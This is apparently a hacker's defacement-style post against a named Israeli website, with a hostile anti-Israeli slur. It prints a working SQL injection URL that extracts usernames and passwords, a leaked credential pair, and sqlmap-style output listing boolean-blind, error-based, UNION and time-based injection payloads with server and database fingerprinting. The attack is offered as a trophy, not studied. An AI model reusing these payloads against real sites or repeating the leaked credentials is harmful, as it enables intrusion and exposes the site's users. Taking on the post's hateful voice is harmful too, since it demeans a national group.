published by JM511 > www.avicom.co.il

1. Published by JM511
2.  
3. Follow me : www.twitter.com/JM511
4.  
5. FUCK TO ISRAELI
6.  
7. ==================
8.  
9. http://www.avicom.co.il/page.php?id=-2+union+select+1,group_concat%28username,0x3a,password%29,3,4+from+sismaot--
10.  
11. Database: avicom
12. Table: sismaot
13. [1 entry]
14. +----+----------+----------+
15. | id | username | password |
16. +----+----------+----------+
17. | 2 | mike | imk |
18. +----+----------+-----
19.  
20. Place: GET
21. Parameter: id
22. Type: boolean-based blind
23. Title: AND boolean-based blind - WHERE or HAVING clause
24. Payload: id=1 AND 3812=3812
25.  
26. Type: error-based
27. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
28. Payload: id=1 AND (SELECT 5906 FROM(SELECT COUNT(*),CONCAT(0x3a6d6d663a,(SELECT (CASE WHEN (5906=5906) THEN 1 ELSE 0 END)),0x3a71776c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
29.  
30. Type: UNION query
31. Title: MySQL UNION query (NULL) - 4 columns
32. Payload: id=1 LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a6d6d663a,0x61486b4e766356776264,0x3a71776c3a), NULL#
33.  
34. Type: AND/OR time-based blind
35. Title: MySQL > 5.0.11 AND time-based blind
36. Payload: id=1 AND SLEEP(5)
37. ---
38.  
39. [10:10:09] [INFO] the back-end DBMS is MySQL
40. web server operating system: Windows 2000
41. web application technology: ASP.NET, PHP 5.1.2, Microsoft IIS 5.0
42. back-end DBMS: MySQL 5.0
43. [10:10:09] [INFO] fetching database names
44. [10:10:09] [INFO] the SQL query used returns 2 entries
45. [10:10:09] [INFO] resumed: "information_schema"
46. [10:10:09] [INFO] resumed: "avicom"
47. available databases [2]:
48. [*] avicom
49. [*] information_schema
50.  
51. -----+